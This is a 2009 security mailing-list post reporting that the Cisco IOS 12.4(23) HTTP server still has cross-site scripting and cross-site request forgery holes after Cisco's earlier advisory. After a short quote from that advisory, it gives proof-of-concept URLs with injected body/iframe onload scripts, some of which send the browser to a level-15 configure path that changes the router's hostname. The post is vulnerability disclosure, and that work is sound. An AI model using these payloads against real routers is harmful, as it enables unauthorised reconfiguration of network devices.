Cisco IOS XSS/CSRF Vulnerability Feb 04 2009 09:56PM
azask2 gmail com
There was a Cisco Product Security Incident Response Team (PSIRT)

advisory recently concerning some XSS/CSRF holes in the IOS..

quote{

Document ID: 98605

http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

Cisco Response:

"Two separate Cisco IOS® Hypertext Transfer Protocol (HTTP) cross-site

scripting (XSS) vulnerabilities have been reported to Cisco [...]

This response covers two separate cross-site scripting vulnerabilities

within the Cisco IOS Hypertext Transfer Protocol (HTTP) server

(including HTTP secure server - here after referred to as purely HTTP

Server) and applies to all Cisco products that run Cisco IOS Software

versions 11.0 through 12.4 with the HTTP server enabled.

};

According to this advisory these holes were patched in 12.4(15)T8 and

12.4(23).

However i found that the Cisco IOS ( 12.4(23) ) HTTP Server is still

prone to multiple cross-site scripting vulnerabilities because it fails

to sufficiently sanitize user-supplied data.

The attacker may leverage these issues to execute arbitrary script code

in the browser of an unsuspecting user in the context of the affected site.

Proof of concept:

furchtbar#sh ver | i IOS

Cisco IOS Software, C2600 Software (C2600-ADVSECURITYK9-M), Version

12.4(23), RELEASE SOFTWARE (fc1)

furchtbar#show ip http server status | include status

HTTP server status: Enabled

HTTP secure server status: Enabled

furchtbar#sh ip int br | i up

FastEthernet0/0 192.168.1.2 YES NVRAM

up up

...

[XSS]

http://192.168.1.2/level/15/exec/-/"><body onload=alert("bug")>

http://192.168.1.2/level/15/exec/-/"><iframe onload=alert("bug")>

http://192.168.1.2/exec/"><body onload="alert('bug');">

[CSRF]

http://192.168.1.2/level/15/exec/-/"><body

onload=window.location='http://192.168.1.2/level/15/configure/-/hostname
/BUGGY/CR'>

http://192.168.1.2/exec/"><iframe

src="http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR">

Best Regards,

Zloss

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus